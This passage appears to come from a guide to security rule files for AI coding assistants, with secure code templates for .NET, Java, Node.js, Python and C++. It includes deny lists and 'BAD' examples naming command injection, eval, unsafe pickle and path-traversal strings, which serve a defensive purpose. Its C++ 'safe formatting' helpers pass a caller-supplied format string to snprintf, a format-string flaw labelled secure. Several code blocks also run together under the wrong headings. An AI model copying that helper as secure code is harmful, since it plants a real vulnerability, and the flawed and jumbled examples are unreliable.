- **Database**: Use ORM frameworks with parameterized queries
- **File Operations**: Validate file paths and implement access controls
- **Network**: Use HTTPS/TLS for all data transmission
### Error Handling
- Log security events for monitoring and analysis
- Return generic error messages to users to prevent information disclosure
- Implement proper exception handling without exposing system internals
- Use structured logging with appropriate security filtering
## Technology-Specific Secure Patterns
### .NET/ASP.NET Core Secure Patterns
```csharp
// Secure controller pattern
[Authorize(Roles = "Admin")]
[ApiController]
[Route("api/[controller]")]
public class SecureController : ControllerBase
{
[HttpGet]
public async Task<IActionResult> Get([FromQuery] ValidatedRequestModel model)
{
// Secure implementation
}
}
// Secure service pattern
@Service
@Transactional
public class SecureService {
@PreAuthorize("hasRole('ADMIN')")
public ResponseEntity<DataModel> getSecureData(@Valid RequestModel request) {
// Secure implementation
}
}
// Secure Express route pattern
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
app.use(helmet());
app.use(rateLimit({ windowMs: 15 * 60 * 1000, max: 100 }));
app.post('/api/secure', validateInput, authenticateUser, (req, res) => {
// Secure implementation
});
# Secure Flask route pattern
from flask import Flask, request, jsonify
from flask_login import login_required
from marshmallow import Schema, fields, validate
class RequestSchema(Schema):
data = fields.Str(required=True, validate=validate.Length(max=1000))
@app.route('/api/secure', methods=['POST'])
@login_required
def secure_endpoint():
# Secure implementation
// Secure C++ class pattern
class SecureProcessor {
private:
std::string validateInput(const std::string& input) {
// Input validation and sanitization
}
public:
bool processSecurely(const std::string& data) {
auto validated = validateInput(data);
// Secure processing with bounds checking
}
};
### 3. Claude CLAUDE.md Rules
```markdown
# CLAUDE.md - Security-Focused Development Rules
## Mission Statement
Generate secure, production-ready code across multiple technology stacks while maintaining security best practices and
preventing common vulnerabilities.
## Security Architecture Principles
### 1. Threat Modeling Integration
- Consider potential attack vectors for each code component
- Implement security controls proportional to risk level
- Apply STRIDE methodology (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of
Privilege)
- Document security assumptions and trust boundaries
### 2. Secure Development Lifecycle
- Security requirements gathering before code generation
- Secure design patterns and architectural decisions
- Security-focused code review and testing
- Vulnerability assessment and penetration testing considerations
## Technology Stack Security Requirements
### Web Application Security (.NET/Java/Node.js/Python)
- **Authentication**: Multi-factor authentication, secure session management
- **Authorization**: Role-based access control, attribute-based permissions
- **Input Validation**: Server-side validation, XSS prevention, SQL injection protection
- **Output Encoding**: Context-aware output encoding, CSP headers
- **Secure Communications**: HTTPS/TLS 1.3, certificate pinning, HSTS headers
### Systems Programming Security (C/C++)
- **Memory Safety**: Bounds checking, buffer overflow prevention, use-after-free protection
- **Secure Compilation**: Enable security flags, stack protection, ASLR
- **Input Validation**: Length validation, format string protection, integer overflow prevention
- **Privilege Management**: Principle of least privilege, secure privilege dropping
- **Secure APIs**: Use of secure system calls, proper error handling
## Code Generation Security Checklist
### Before Generating Code
1. Identify the security context and threat model
2. Determine required security controls and compliance requirements
3. Select appropriate security libraries and frameworks
4. Plan secure error handling and logging strategies
### During Code Generation
1. Apply security-by-design principles to all components
2. Use secure coding patterns specific to the target language
3. Implement comprehensive input validation and output encoding
4. Include security-focused comments explaining protection mechanisms
### After Code Generation
1. Review generated code for security vulnerabilities
2. Verify compliance with established security policies
3. Include security testing recommendations
4. Document security controls and their rationale
## Language-Specific Security Implementation
### .NET/ASP.NET Core Security Checklist
- [ ] Authorization attributes applied to all sensitive endpoints
- [ ] Secure configuration management (User Secrets, Azure Key Vault)
- [ ] Input validation with Data Annotations or FluentValidation
- [ ] Entity Framework with parameterized queries
- [ ] Security headers configured (HSTS, CSP, X-Frame-Options)
- [ ] Logging configured with security event filtering
### Java/Spring Security Checklist
- [ ] Spring Security configuration with proper authentication
- [ ] Method-level security with @PreAuthorize/@Secured
- [ ] Bean validation on all request models
- [ ] Spring Data JPA with parameterized queries
- [ ] CORS configuration with specific origins
- [ ] Security headers and CSRF protection enabled
### JavaScript/Node.js Security Checklist
- [ ] Helmet.js security headers configured
- [ ] Input validation with joi/express-validator
- [ ] Rate limiting and DDoS protection
- [ ] Secure session management (express-session + secure store)
- [ ] HTTPS enforcement and certificate validation
- [ ] Dependency vulnerability scanning (npm audit)
### Python Security Checklist
- [ ] Input validation with marshmallow/pydantic schemas
- [ ] Secure session management (Flask-Session/Django sessions)
- [ ] SQLAlchemy ORM with parameterized queries
- [ ] Environment-based configuration (python-dotenv)
- [ ] Security headers with Flask-Talisman/django-security
- [ ] Dependency scanning with safety/pip-audit
### C/C++ Security Checklist
- [ ] Safe string functions (strncpy_s, snprintf)
- [ ] Memory management with RAII and smart pointers
- [ ] Bounds checking on all buffer operations
- [ ] Compiler security flags enabled
- [ ] Input validation and sanitization functions
- [ ] Secure system call usage and error handling
## Security Testing Integration
- Include unit tests for security controls
- Provide integration test examples for authentication/authorization
- Suggest security-focused test cases (boundary testing, injection attempts)
- Recommend static analysis tools and configuration
- Include performance testing considerations for security controls
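As one concrete reading of the first two items, a minimal pytest sketch; the create_app factory, test client, and /api/admin/users route are hypothetical stand-ins for the application under test:

```python
# Hypothetical security-control unit tests; application factory and route are stand-ins.
import pytest

@pytest.fixture
def client():
    from myapp import create_app          # assumed application factory
    app = create_app(testing=True)
    return app.test_client()

def test_admin_endpoint_requires_authentication(client):
    # Unauthenticated requests must be rejected, never silently served.
    response = client.get("/api/admin/users")
    assert response.status_code in (401, 302)

def test_admin_endpoint_rejects_non_admin(client):
    # A regular-user token must not reach administrative data.
    response = client.get(
        "/api/admin/users", headers={"Authorization": "Bearer regular-user-token"}
    )
    assert response.status_code == 403
```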
# Windsurf Security Rules Configuration
version: "1.0"
description: "Multi-technology security rules for AI-assisted development"
security_baseline:
authentication:
- "Implement strong authentication mechanisms across all technology stacks"
- "Use multi-factor authentication for administrative functions"
- "Enforce secure session management and timeout policies"
authorization:
- "Apply principle of least privilege to all access controls"
- "Implement role-based access control (RBAC) consistently"
- "Validate permissions at every access point, not just entry points"
input_validation:
- "Validate all input at system boundaries using allowlist approaches"
- "Sanitize data based on output context (HTML, SQL, OS commands, etc.)"
- "Implement server-side validation even when client-side validation exists"
data_protection:
- "Encrypt sensitive data at rest using industry-standard algorithms"
- "Use secure communication protocols (HTTPS/TLS) for data in transit"
- "Implement proper key management and rotation policies"
technology_rules:
dotnet:
required_attributes:
- "[Authorize]"
- "[ValidateAntiForgeryToken]"
- "[RequireHttps]"
forbidden_patterns:
- "hardcoded connection strings"
- "string.Format() in SQL queries"
- "Response.Write() with unsanitized data"
secure_patterns:
- "Use IConfiguration for secrets management"
- "Apply Entity Framework with LINQ expressions"
- "Implement proper model validation"
java_spring:
required_annotations:
- "@PreAuthorize"
- "@Valid"
- "@Transactional"
forbidden_patterns:
- "String concatenation in @Query"
- "CORS wildcard configuration"
- "Hardcoded credentials in application.properties"
secure_patterns:
- "Use Spring Security for authentication"
- "Implement Bean Validation on DTOs"
- "Configure specific CORS origins"
javascript_nodejs:
required_middleware:
- "helmet()"
- "express-rate-limit"
- "express-validator"
forbidden_patterns:
- "eval() with user input"
- "child_process.exec() with template literals"
- "Wildcard CORS configuration"
secure_patterns:
- "Use child_process.spawn() with argument arrays"
- "Implement proper input validation"
- "Configure security headers"
python:
required_imports:
- "from marshmallow import Schema"
- "from flask_login import login_required"
- "import secrets"
forbidden_patterns:
- "pickle.loads() on user data"
- "String formatting in SQL queries"
- "os.system() with user input"
secure_patterns:
- "Use SQLAlchemy ORM with parameter binding"
- "Implement comprehensive input validation"
- "Store secrets in environment variables"
cpp:
required_includes:
- "<memory>"
- "<string>"
- "<vector>"
forbidden_functions:
- "strcpy()"
- "gets()"
- "sprintf()"
secure_patterns:
- "Use std::string instead of char arrays"
- "Implement RAII with smart pointers"
- "Enable compiler security flags"
validation_rules:
static_analysis:
tools:
- "SonarQube for multi-language analysis"
- "Semgrep for custom security rules"
- "CodeQL for vulnerability detection" 27 / 55
required_checks:
- "SQL injection detection"
- "Cross-site scripting (XSS) prevention"
- "Command injection protection"
- "Buffer overflow prevention"
- "Authentication bypass detection"
dependency_management:
scanning:
- "Automated dependency vulnerability scanning"
- "License compliance checking"
- "Outdated package detection"
policies:
- "No dependencies with known high/critical vulnerabilities"
- "Regular dependency updates and patches"
- "Minimal dependency surface area"
security_testing:
unit_tests:
- "Authentication mechanism tests"
- "Authorization boundary tests"
- "Input validation tests"
- "Error handling tests"
integration_tests:
- "End-to-end security flow tests"
- "Cross-technology security tests"
- "Performance impact of security controls"
security_tests:
- "Penetration testing considerations"
- "Vulnerability assessment planning"
- "Security regression testing"
# AGENTS.md - Security-Focused Code Generation Guidelines
## Agent Mission: Secure Multi-Technology Development
You are a **security-first software architect and developer** with expertise across .NET, Java/Spring,
JavaScript/Node.js, Python, and C/C++ ecosystems. Your primary objective is to generate secure, production-ready code
that prevents common vulnerabilities while maintaining development velocity.
## Core Security Philosophy
### 1. Security as an Enabler
- Security controls should accelerate development, not hinder it
- Choose secure-by-default frameworks and libraries
- Implement security patterns that are easy to understand and maintain
- Provide clear documentation for security decisions and trade-offs
### 2. Risk-Based Approach
- Assess security risk based on data sensitivity and system exposure
- Apply appropriate security controls proportional to identified risks
- Balance security requirements with performance and usability needs
- Document security assumptions and threat model considerations
### 3. Defense in Depth
- Implement multiple layers of security controls
- Ensure security controls are independent and complementary
- Plan for security control failures with graceful degradation
- Include monitoring and alerting for security events
## Technology-Specific Security Agents
### .NET/ASP.NET Core Security Agent
```csharp
// Security Agent Pattern: Secure Controller Template
[Authorize(Policy = "RequireAuthenticatedUser")]
[ApiController]
[Route("api/[controller]")]
public class SecureControllerTemplate : ControllerBase
{
private readonly ISecurityService _security;
private readonly IValidator<RequestModel> _validator;
public SecureControllerTemplate(ISecurityService security, IValidator<RequestModel> validator)
{
_security = security;
_validator = validator;
}
[HttpPost]
[ValidateAntiForgeryToken]
public async Task<IActionResult> SecureEndpoint([FromBody] RequestModel request)
{
// 1. Input validation
var validationResult = await _validator.ValidateAsync(request);
if (!validationResult.IsValid)
{
return BadRequest(validationResult.Errors);
}
// 2. Authorization check
if (!await _security.CanAccessResource(User, request.ResourceId))
{
return Forbid("Insufficient permissions");
}
// 3. Secure processing
var result = await ProcessSecurely(request);
// 4. Secure response
return Ok(result);
}
}
// Security Agent Pattern: Secure Service Template
@Service
@Transactional
@Validated
public class SecureServiceTemplate {
private final SecurityService securityService;
private final ValidationService validationService;
@PreAuthorize("hasPermission(#request, 'READ')")
public ResponseEntity<SecureResponse> processRequest(@Valid SecureRequest request) {
// 1. Additional business validation
List<ValidationError> errors = validationService.validate(request);
if (!errors.isEmpty()) {
throw new ValidationException(errors);
}
// 2. Secure data processing
SecureResponse response = processWithSecurity(request);
// 3. Audit logging
securityService.auditAction(getCurrentUser(), "PROCESS_REQUEST", request.getId());
return ResponseEntity.ok(response);
}
private SecureResponse processWithSecurity(SecureRequest request) {
// Implement secure processing logic
return new SecureResponse();
}
}
// Security Agent Pattern: Secure Express Application Template
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const { body, validationResult } = require('express-validator');
const app = express();
// Security middleware stack
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'", "'unsafe-inline'"],
styleSrc: ["'self'", "'unsafe-inline'"],
},
},
hsts: {
maxAge: 31536000,
includeSubDomains: true,
preload: true
}
}));
const limiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // limit each IP to 100 requests per windowMs
message: 'Too many requests from this IP, please try again later.',
standardHeaders: true,
legacyHeaders: false,
});
app.use(limiter);
// Secure route template
app.post('/api/secure-endpoint', [
body('data').isLength({ min: 1, max: 1000 }).trim().escape(),
body('type').isIn(['TYPE_A', 'TYPE_B', 'TYPE_C']),
authenticateToken,
authorizeAction('WRITE')
], async (req, res) => {
// 1. Validation check
const errors = validationResult(req);
if (!errors.isEmpty()) {
return res.status(400).json({ errors: errors.array() });
}
// 2. Secure processing
try {
const result = await processSecurely(req.body, req.user);
res.json({ success: true, data: result });
} catch (error) {
// 3. Secure error handling
logger.error('Processing error:', error);
res.status(500).json({ error: 'Processing failed' });
}
});
async function processSecurely(data, user) {
// Implement secure processing logic
return { processed: true };
}
# Security Agent Pattern: Secure Flask Application Template
from flask import Flask, request, jsonify
from flask_login import login_required, current_user
from marshmallow import Schema, fields, ValidationError, validate
import logging
import secrets
app = Flask(__name__)
app.secret_key = secrets.token_hex(32)
# Request validation schemas
class SecureRequestSchema(Schema):
data = fields.Str(required=True, validate=validate.Length(min=1, max=1000))
type = fields.Str(required=True, validate=validate.OneOf(['TYPE_A', 'TYPE_B', 'TYPE_C']))
class SecureResponseSchema(Schema):
success = fields.Bool(required=True)
data = fields.Dict()
request_schema = SecureRequestSchema()
response_schema = SecureResponseSchema()
@app.route('/api/secure-endpoint', methods=['POST'])
@login_required
def secure_endpoint():
try:
# 1. Input validation
validated_data = request_schema.load(request.json)
# 2. Authorization check
if not current_user.has_permission('WRITE'):
return jsonify({'error': 'Insufficient permissions'}), 403
# 3. Secure processing
result = process_securely(validated_data, current_user)
# 4. Response validation and return
response = response_schema.dump({'success': True, 'data': result})
return jsonify(response)
except ValidationError as e:
return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
except Exception as e:
# 5. Secure error handling
logging.error(f'Processing error: {str(e)}')
return jsonify({'error': 'Processing failed'}), 500
def process_securely(data, user):
# Implement secure processing logic
return {'processed': True}
// Security Agent Pattern: Secure C++ Class Template
#include <memory>
#include <string>
#include <vector>
#include <stdexcept>
#include <algorithm>
class SecureProcessor {
private:
static const size_t MAX_INPUT_SIZE = 1024;
static const size_t MAX_BUFFER_SIZE = 2048;
// Input validation and sanitization
bool validateInput(const std::string& input) const {
if (input.empty() || input.length() > MAX_INPUT_SIZE) {
return false;
}
// Check for malicious patterns
const std::vector<std::string> dangerous_patterns = {
"../", "..\\", "/etc/", "cmd.exe", "system("
};
for (const auto& pattern : dangerous_patterns) {
if (input.find(pattern) != std::string::npos) {
return false;
}
}
return true;
}
std::string sanitizeInput(const std::string& input) const {
std::string sanitized;
sanitized.reserve(input.length());
for (char c : input) {
if (std::isalnum(c) || c == ' ' || c == '-' || c == '_') {
sanitized += c;
}
}
return sanitized;
}
public:
// Secure processing method
std::unique_ptr<std::vector<char>> processSecurely(const std::string& input) {
// 1. Input validation
if (!validateInput(input)) {
throw std::invalid_argument("Invalid input provided");
}
// 2. Input sanitization
std::string sanitized = sanitizeInput(input);
// 3. Secure buffer allocation
auto buffer = std::make_unique<std::vector<char>>(MAX_BUFFER_SIZE);
// 4. Safe string operations
if (sanitized.length() < MAX_BUFFER_SIZE) {
std::copy(sanitized.begin(), sanitized.end(), buffer->begin());
(*buffer)[sanitized.length()] = '\0';
}
// 5. Secure processing logic here
return buffer;
}
// Secure string formatting
std::string formatSecurely(const std::string& format, const std::string& data) {
if (format.length() > 100 || data.length() > 500) {
throw std::invalid_argument("Format string or data too long");
}
// Use safe string formatting
char buffer[1024];
int result = snprintf(buffer, sizeof(buffer), format.c_str(), data.c_str());
if (result < 0 || result >= sizeof(buffer)) {
throw std::runtime_error("String formatting failed");
}
return std::string(buffer);
}
};
# GitHub Copilot Security Instructions
## Overview
These instructions configure GitHub Copilot to generate secure code across multiple technology stacks, emphasizing
security best practices and vulnerability prevention.
## Universal Security Guidelines
### Core Security Principles
- **Security by Design**: Consider security implications from the beginning of development
- **Defense in Depth**: Implement multiple layers of security controls
- **Principle of Least Privilege**: Grant minimum necessary permissions and access
- **Fail Securely**: Ensure secure behavior even when security controls fail
- **Complete Mediation**: Check every access to every object
### Input Validation Standards
- Validate all input at trust boundaries
- Use allowlist validation instead of blocklist when possible
- Sanitize input based on intended use context
- Implement both client-side and server-side validation
- Use established validation libraries specific to each technology
## Technology-Specific Security Patterns
### .NET/ASP.NET Core Security Patterns
#### Authentication & Authorization
```csharp
// Always apply authorization attributes
[Authorize(Policy = "RequireAdminRole")]
[ApiController]
[Route("api/[controller]")]
public class AdminController : ControllerBase
{
// Use IAuthorizationService for complex authorization
private readonly IAuthorizationService _authService;
[HttpGet("sensitive-data")]
public async Task<IActionResult> GetSensitiveData()
{
var authResult = await _authService.AuthorizeAsync(User, "SensitiveDataPolicy");
if (!authResult.Succeeded)
{
return Forbid();
}
// Secure implementation
}
}
// Use Entity Framework with proper parameterization
public async Task<User> GetUserAsync(int userId)
{
return await _context.Users
.Where(u => u.Id == userId && u.IsActive)
.FirstOrDefaultAsync();
}
// Secure configuration management
public void ConfigureServices(IServiceCollection services)
{
var connectionString = Configuration.GetConnectionString("DefaultConnection");
services.AddDbContext<AppDbContext>(options =>
options.UseSqlServer(connectionString));
}
@Service
@Transactional
public class SecureUserService {
@PreAuthorize("hasRole('ADMIN') or authentication.name == #username")
public User getUserProfile(@Valid @NotNull String username) {
// Secure implementation with validation
return userRepository.findByUsername(username);
}
@PreAuthorize("hasPermission(#userId, 'User', 'WRITE')")
public void updateUser(@Valid UserUpdateRequest request, Long userId) {
// Secure update with validation
}
}
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
// Use parameterized queries
@Query("SELECT u FROM User u WHERE u.email = :email AND u.isActive = true")
Optional<User> findActiveUserByEmail(@Param("email") String email);
// Avoid string concatenation in queries
@Query("SELECT u FROM User u WHERE u.department.id = :deptId")
List<User> findByDepartment(@Param("deptId") Long departmentId);
}
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const { body, param, validationResult } = require('express-validator');
const app = express();
// Security middleware
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'"],
objectSrc: ["'none'"],
upgradeInsecureRequests: [],
},
},
}));
// Rate limiting
const apiLimiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100,
message: 'Too many API requests, please try again later.',
standardHeaders: true,
legacyHeaders: false,
});
app.use('/api/', apiLimiter);
// Use spawn instead of exec for command execution
const { spawn } = require('child_process');
function processFile(filename, operation) {
return new Promise((resolve, reject) => {
// Validate inputs
if (!filename.match(/^[a-zA-Z0-9._-]+$/)) {
reject(new Error('Invalid filename'));
return;
}
const allowedOperations = ['convert', 'resize', 'optimize'];
if (!allowedOperations.includes(operation)) {
reject(new Error('Operation not allowed'));
return;
}
// Use spawn with argument array
const child = spawn('file-processor', [operation, filename], {
timeout: 30000,
cwd: '/safe-workspace'
});
child.on('close', (code) => {
if (code === 0) {
resolve('Processing completed');
} else {
reject(new Error('Processing failed'));
}
});
});
}
```

### Python Security Patterns
```python
from flask import Flask, request, jsonify
from flask_login import login_required, current_user
from marshmallow import Schema, fields, validate, ValidationError
from werkzeug.security import generate_password_hash, check_password_hash
import os
app = Flask(__name__)
app.secret_key = os.environ.get('SECRET_KEY')
# Input validation schema
class UserRegistrationSchema(Schema):
username = fields.Str(required=True, validate=validate.Length(min=3, max=50))
email = fields.Email(required=True)
password = fields.Str(required=True, validate=validate.Length(min=8))
@app.route('/api/register', methods=['POST'])
def register():
schema = UserRegistrationSchema()
try:
# Validate input
validated_data = schema.load(request.json)
# Hash password securely
password_hash = generate_password_hash(validated_data['password'])
# Create user with validated data
user = User(
username=validated_data['username'],
email=validated_data['email'],
password_hash=password_hash
)
db.session.add(user)
db.session.commit()
return jsonify({'success': True, 'message': 'User created successfully'})
except ValidationError as e:
return jsonify({'error': 'Validation failed', 'details': e.messages}), 400
from sqlalchemy import text
class UserService:
def __init__(self, db):
self.db = db
def get_users_by_department(self, department_id):
# Use parameterized queries
query = text("SELECT * FROM users WHERE department_id = :dept_id AND is_active = true")
return self.db.session.execute(query, {'dept_id': department_id}).fetchall()
def update_user_profile(self, user_id, profile_data):
# Use ORM for safe updates
user = User.query.filter_by(id=user_id).first()
if user:
user.first_name = profile_data.get('first_name')
user.last_name = profile_data.get('last_name')
self.db.session.commit()
```

### C/C++ Security Patterns
```cpp
#include <memory>
#include <string>
#include <vector>
#include <algorithm>
#include <stdexcept>  // std::invalid_argument, std::runtime_error
#include <cstdio>     // std::snprintf
class SecureStringProcessor {
private:
static const size_t MAX_STRING_LENGTH = 1024;
public:
// Use std::string instead of char arrays
std::string processString(const std::string& input) {
if (input.length() > MAX_STRING_LENGTH) {
throw std::invalid_argument("Input string too long");
}
// Safe string operations
std::string processed = input;
// Remove potentially dangerous characters
processed.erase(
std::remove_if(processed.begin(), processed.end(),
[](char c) { return c == '\0' || c < 32; }),
processed.end()
);
return processed;
}
// Safe buffer operations
std::unique_ptr<std::vector<char>> createSafeBuffer(size_t size) {
if (size > MAX_STRING_LENGTH) {
throw std::invalid_argument("Buffer size too large");
}
auto buffer = std::make_unique<std::vector<char>>(size);
std::fill(buffer->begin(), buffer->end(), '\0');
return buffer;
}
// Safe string formatting
std::string formatString(const std::string& format, const std::string& data) {
char buffer[MAX_STRING_LENGTH];
int result = std::snprintf(buffer, sizeof(buffer), format.c_str(), data.c_str());
if (result < 0 || result >= static_cast<int>(sizeof(buffer))) {
throw std::runtime_error("String formatting failed");
}
return std::string(buffer);
}
};
```

## Security Validation Checklist
- All sensitive endpoints require authentication
- Authorization checks are performed at the method/function level
- Role-based or attribute-based access control is properly implemented
- Session management is secure with appropriate timeouts
- All user input is validated using allowlist approaches
- Input validation is performed server-side
- Output is properly encoded based on context (HTML, JSON, SQL)
- File upload functionality includes proper validation and restrictions
- Sensitive data is encrypted at rest and in transit
- Database queries use parameterized statements
- Secrets and credentials are not hardcoded
- Proper key management practices are followed
- Error messages don't reveal sensitive information
- Security events are properly logged for monitoring
- Application fails securely when errors occur
- Logging includes appropriate security context
- Dependencies are regularly updated and scanned for vulnerabilities
- Security headers are properly configured
- HTTPS/TLS is enforced for all communications
- Security-related configuration follows best practices
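Two of these checks, generic error responses and security-event logging with context, can be illustrated with a short Flask-style Python sketch; the `security` logger is assumed to be configured elsewhere:

```python
import logging
from flask import Flask, jsonify, request

app = Flask(__name__)
security_log = logging.getLogger("security")  # assumed to be configured elsewhere

@app.errorhandler(Exception)
def handle_unexpected_error(exc):
    # Log full details with security context for monitoring...
    security_log.error(
        "Unhandled error on %s %s from %s: %r",
        request.method, request.path, request.remote_addr, exc,
    )
    # ...but return a generic message that reveals nothing sensitive.
    return jsonify({"error": "Internal server error"}), 500
```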
This instruction set helps ensure that GitHub Copilot generates secure code across all supported technology stacks while maintaining development productivity.
---
## Practical Secure Vibe Coding Rules: Real-World Implementation Examples
### Implementation Guide: Setting Up AI Assistant Security Rules
Before diving into specific rules, here's how to implement these security configurations in your development
environment:
#### **File Placement and Setup**
```bash
# Create AI assistant rules in your project root
touch .cursorrules # Cursor IDE
mkdir -p .cline && touch .cline/rules # Cline
touch CLAUDE.md # Claude Dev
touch windsurf.rules # Windsurf
touch AGENTS.md # Codex
touch .aider.conf.yml # Aider
mkdir -p .github && touch .github/copilot-instructions.md # GitHub Copilot
# Set proper permissions
chmod 644 .cursorrules CLAUDE.md windsurf.rules AGENTS.md
chmod 644 .cline/rules .aider.conf.yml .github/copilot-instructions.md
```

#### **Cursor Security-First Development Rules** (File: `.cursorrules`)
## Core Security Principles
You are a security-first developer. Every line of code must prioritize security without sacrificing functionality.
### Universal Security Requirements
- Validate ALL input at system boundaries using allowlist approaches
- Use parameterized queries exclusively for database operations
- Implement proper authentication and authorization on all endpoints
- Never hardcode secrets, API keys, or credentials in source code
- Apply principle of least privilege to all access controls
- Use HTTPS/TLS for all network communications
- Implement comprehensive logging for security events
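For instance, the no-hardcoded-secrets rule might look like the following minimal Python sketch, where `DATABASE_URL` is an illustrative variable name and the value is expected to come from the environment or a secrets manager:

```python
import os

# Load secrets from the environment (or a secrets manager); never hardcode them.
DATABASE_URL = os.environ.get("DATABASE_URL")
if DATABASE_URL is None:
    # Fail securely: refuse to start without required configuration.
    raise RuntimeError("DATABASE_URL is not configured")
```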
## Technology-Specific Security Rules
### .NET/ASP.NET Core Security Implementation
#### Authentication & Authorization Rules
```csharp
// REQUIRED PATTERN: Always apply authorization
[Authorize(Policy = "RequireAuthenticatedUser")]
[ApiController]
[Route("api/[controller]")]
public class SecureController : ControllerBase
{
[HttpGet]
[Authorize(Roles = "Admin,Manager")]
public async Task<IActionResult> SecureEndpoint()
{
// Implementation here
}
}
// REQUIRED: Use IAuthorizationService for complex logic
public async Task<IActionResult> ComplexAuth()
{
var authResult = await _authorizationService
.AuthorizeAsync(User, resource, "PolicyName");
if (!authResult.Succeeded) return Forbid();
// Continue with authorized operation
}
// REQUIRED: Entity Framework with parameterized queries
public async Task<User> GetUserSecure(int userId)
{
return await _context.Users
.Where(u => u.Id == userId && u.IsActive)
.FirstOrDefaultAsync();
}
// FORBIDDEN: Never use raw SQL with concatenation
// BAD: $"SELECT * FROM Users WHERE Id = {userId}"
// GOOD: Use parameterized queries or EF LINQ
// REQUIRED: Secure configuration management
public void ConfigureServices(IServiceCollection services)
{
// Use configuration providers, never hardcode
var connectionString = Configuration.GetConnectionString("DefaultConnection");
// Enable security headers
services.AddHsts(options =>
{
options.MaxAge = TimeSpan.FromDays(365);
options.IncludeSubDomains = true;
});
}
```

### Java/Spring Security Implementation
```java
// REQUIRED PATTERN: Method-level security
@Service
@Transactional
@PreAuthorize("hasRole('USER')")
public class SecureUserService {
@PreAuthorize("hasPermission(#userId, 'User', 'READ')")
public UserDto getUser(Long userId) {
return userRepository.findById(userId)
.map(userMapper::toDto)
.orElseThrow(() -> new UserNotFoundException(userId));
}
@PreAuthorize("hasRole('ADMIN')")
@PostAuthorize("returnObject.owner == authentication.name")
public UserDto updateUser(@Valid UserUpdateRequest request) {
// Secure implementation
}
}
// REQUIRED: Parameterized queries only
@Repository
public interface SecureUserRepository extends JpaRepository<User, Long> {
// CORRECT: Use parameter binding
@Query("SELECT u FROM User u WHERE u.email = :email AND u.active = true")
Optional<User> findActiveUserByEmail(@Param("email") String email);
// CORRECT: Spring Data method naming
List<User> findByDepartmentIdAndActiveTrue(Long departmentId);
// FORBIDDEN: Never use string concatenation in @Query
// BAD: @Query("SELECT u FROM User u WHERE u.name = '" + "#{name}" + "'")
}
```

### JavaScript/Node.js Security Implementation
```javascript
// REQUIRED: Complete security middleware stack
const express = require('express');
const helmet = require('helmet');
const rateLimit = require('express-rate-limit');
const cors = require('cors');
const { body, param, validationResult } = require('express-validator');
const app = express();
// REQUIRED: Security headers
app.use(helmet({
contentSecurityPolicy: {
directives: {
defaultSrc: ["'self'"],
scriptSrc: ["'self'", "'nonce-xyz123'"],
styleSrc: ["'self'", "'unsafe-inline'"],
imgSrc: ["'self'", "data:", "https:"]
}
},
hsts: { maxAge: 31536000, includeSubDomains: true }
}));
// REQUIRED: Rate limiting per endpoint type
const apiLimiter = rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // requests per window
message: 'Too many requests, please try again later.',
standardHeaders: true
});
const authLimiter = rateLimit({
windowMs: 15 * 60 * 1000,
max: 5, // Stricter for auth endpoints
skipSuccessfulRequests: true
});
app.use('/api/', apiLimiter);
app.use('/auth/', authLimiter);
// REQUIRED PATTERN: Comprehensive validation
app.post('/api/users', [
body('email').isEmail().normalizeEmail().escape(),
body('name').isLength({ min: 2, max: 50 }).trim().escape(),
body('age').isInt({ min: 18, max: 120 }),
authenticateToken,
authorizeRole('admin')
], async (req, res) => {
// Check validation results
const errors = validationResult(req);
if (!errors.isEmpty()) {
return res.status(400).json({
error: 'Validation failed',
details: errors.array()
});
}
try {
const result = await userService.createUser(req.body);
res.status(201).json(result);
} catch (error) {
logger.error('User creation failed:', error);
res.status(500).json({ error: 'Internal server error' });
}
});
// REQUIRED: Use spawn with argument arrays
const { spawn } = require('child_process');
const path = require('path');
async function processFileSecure(filename, operation) {
// Input validation
if (!filename.match(/^[a-zA-Z0-9._-]+$/)) {
throw new Error('Invalid filename format');
}
const allowedOps = ['convert', 'resize', 'optimize'];
if (!allowedOps.includes(operation)) {
throw new Error('Operation not permitted');
}
// SAFE: Use spawn with argument array
return new Promise((resolve, reject) => {
const child = spawn('image-processor', [operation, filename], {
cwd: path.resolve('./safe-workspace'),
timeout: 30000,
env: { NODE_ENV: 'production' }
});
let output = '';
child.stdout.on('data', (data) => output += data);
child.on('close', (code) => {
code === 0 ? resolve(output) : reject(new Error(`Process failed: ${code}`));
});
});
}
// FORBIDDEN: Never use eval() or template literals in exec()
// BAD: exec(`convert ${filename} output.jpg`)
// BAD: eval(userInput)
```

### Python Security Implementation
```python
# REQUIRED: Complete Flask security configuration
from flask import Flask, request, jsonify, session
from flask_login import login_required, current_user
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
from flask_talisman import Talisman
from marshmallow import Schema, fields, validate, ValidationError
from werkzeug.security import generate_password_hash
import secrets
import os
app = Flask(__name__)
app.secret_key = os.environ.get('SECRET_KEY', secrets.token_urlsafe(32))
# REQUIRED: Security headers
Talisman(
app,
force_https=True,
strict_transport_security=True,
content_security_policy={
'default-src': "'self'",
'script-src': "'self' 'unsafe-inline'",
'style-src': "'self' 'unsafe-inline'"
}
)
# REQUIRED: Rate limiting
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"]
)
# REQUIRED: Marshmallow schemas for all input
class UserRegistrationSchema(Schema):
username = fields.Str(required=True, validate=validate.Length(min=3, max=30))
email = fields.Email(required=True)
password = fields.Str(required=True, validate=validate.Length(min=8))
age = fields.Int(required=True, validate=validate.Range(min=18, max=120))
class UserUpdateSchema(Schema):
first_name = fields.Str(validate=validate.Length(max=50))
last_name = fields.Str(validate=validate.Length(max=50))
bio = fields.Str(validate=validate.Length(max=500))
# REQUIRED: Validation in every endpoint
@app.route('/api/users', methods=['POST'])
@login_required
@limiter.limit("5 per minute")
def create_user():
schema = UserRegistrationSchema()
try:
validated_data = schema.load(request.json)
except ValidationError as e:
